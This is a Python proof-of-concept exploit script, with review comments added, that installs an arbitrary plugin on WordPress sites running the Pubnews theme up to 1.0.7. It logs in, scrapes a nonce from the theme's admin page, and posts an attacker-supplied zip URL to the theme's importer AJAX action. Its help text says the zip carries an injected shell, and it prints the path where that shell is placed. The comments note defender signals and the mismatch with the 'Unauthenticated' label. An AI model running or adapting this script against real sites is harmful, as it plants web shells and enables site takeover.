import requests
import argparse
import re
# Exploit By Nxploited , Khaled Alenazi
def main():
    """Run the proof-of-concept request sequence against one WordPress site.

    The script logs in through wp-login.php with the supplied account, reads
    the ``_wpnonce`` value embedded in the Pubnews theme-info admin page, and
    sends one ``pubnews_importer_plugin_action`` request to admin-ajax.php
    whose ``link`` field is the caller-supplied zip URL.

    NOTE(review): the description string calls the issue "Unauthenticated",
    but every request below is made from a logged-in session. Which role the
    AJAX handler actually requires is not visible here -- confirm against the
    vendor advisory before rating exposure.

    Defender view: the install step is a POST to /wp-admin/admin-ajax.php
    whose form body (visible to a WAF or request-body logging) carries
    ``action=pubnews_importer_plugin_action`` and a ``link`` parameter holding
    a remote zip URL. A directory appearing under wp-content/plugins/ with no
    matching change record is the on-disk artefact to look for. The
    description string lists Pubnews <= 1.0.7 as the affected range.

    Returns nothing; prints progress and calls ``exit()`` when a step fails.
    """
    parser = argparse.ArgumentParser(description='Pubnews <= 1.0.7 - Unauthenticated Arbitrary Plugin Installation # By Nxploited , Khaled alenazi')
    parser.add_argument('-u', '--url', required=True, help='The URL of the WordPress site')
    parser.add_argument('-un', '--username', required=True, help='The username for WordPress login')
    # A password given as a command-line argument is exposed in shell history
    # and in the process list of the machine running the script.
    parser.add_argument('-p', '--password', required=True, help='The password for WordPress login')
    parser.add_argument('-url_zip', '--plugin_url', required=True, help='The plugin URL to install (must be a zip file with the shell injected inside)')
    args = parser.parse_args()
    session = requests.Session()
    # Certificate validation is switched off and the urllib3 warning about it
    # is silenced, so the server's identity is never checked and the
    # credentials posted below travel over an unverified channel.
    requests.packages.urllib3.disable_warnings()
    session.verify = False
    # The base URL is concatenated as given; no scheme or trailing-slash
    # normalisation is done anywhere in this function.
    login_url = args.url + '/wp-login.php'
    user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
    # Standard wp-login.php form fields; no timeout is set on any request here.
    response = session.post(login_url, verify=False, data={
        'log': args.username,
        'pwd': args.password,
        'rememberme': 'forever',
        'wp-submit': 'Log+In'
    }, headers={"User-Agent": user_agent})
    # Login success is inferred only from a cookie whose name contains
    # 'wordpress_logged_in'; the HTTP status and body are not inspected.
    if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
        print("[+] Logged in successfully.")
    else:
        print("[-] Failed to log in.")
        exit()
    # The theme's info page is fetched because it inlines a JavaScript object
    # (pubnewsThemeInfoObject) that contains the nonce the AJAX action expects.
    admin_page_url = args.url + '/wp-admin/admin.php?page=pubnews-info'
    response = session.get(admin_page_url, verify=False)
    # Non-greedy match from the object's opening brace to the first "_wpnonce"
    # key; '.' does not cross newlines here because re.DOTALL is not passed.
    wpnonce_match = re.search(r'var pubnewsThemeInfoObject = {.*?"_wpnonce":"([^"]+)"', response.text)
    if wpnonce_match:
        admin_wpnonce = wpnonce_match.group(1)
        # The nonce is echoed to stdout, so it ends up in any terminal capture.
        print(f"[+] Admin _wpnonce extracted: {admin_wpnonce}")
    else:
        print("[-] Failed to extract admin _wpnonce.")
        exit()
    # Directory name = last path segment of the zip URL with '.zip' removed;
    # main file = '<dir>/<text before the first dot of dir>.php'. Both are
    # guesses derived from the URL, not read from the archive.
    plugin_file = args.plugin_url.split('/')[-1].replace('.zip', '')
    plugin_file_path = f"{plugin_file}/{plugin_file.split('.')[0]}.php"
    post_url = args.url + '/wp-admin/admin-ajax.php'
    # Header set shaped like a browser XHR issued from the theme-info page.
    headers = {
        "User-Agent": user_agent,
        "Accept": "*/*",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "Referer": args.url + '/wp-admin/admin.php?page=pubnews-info',
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        "Origin": args.url,
        "Connection": "keep-alive",
    }
    # Session cookies are flattened into an explicit Cookie header; the request
    # is still sent through the same session object.
    cookies = session.cookies.get_dict()
    headers['Cookie'] = '; '.join([f'{name}={value}' for name, value in cookies.items()])
    # Form fields of the theme's importer action. 'link' is a caller-controlled
    # remote URL, which is the parameter a detection rule or server-side
    # allow-list would key on.
    install_data = {
        'action': 'pubnews_importer_plugin_action',
        '_wpnonce': admin_wpnonce,
        'plugin_action': 'not-installed',
        'link': args.plugin_url,
        'file': plugin_file_path,
        'importer_or_not': 'true'
    }
    response = session.post(post_url, headers=headers, data=install_data, verify=False)
    # Only HTTP 200 plus the substring 'status' in the body is checked; the
    # response is not parsed, so the messages below are not proof that
    # anything was written to disk.
    if response.status_code == 200 and 'status' in response.text:
        print("[+] Plugin installed successfully.")
        print(f"[+] Plugin extracted. You can find the shell here: /wp-content/plugins/{plugin_file}/")
    else:
        print(f"[-] Failed to install plugin. Status code: {response.status_code}")
        print(response.text)
        exit()
# Script entry point: run main() only when the file is executed directly,
# not when it is imported as a module.
if __name__ == "__main__":
    main()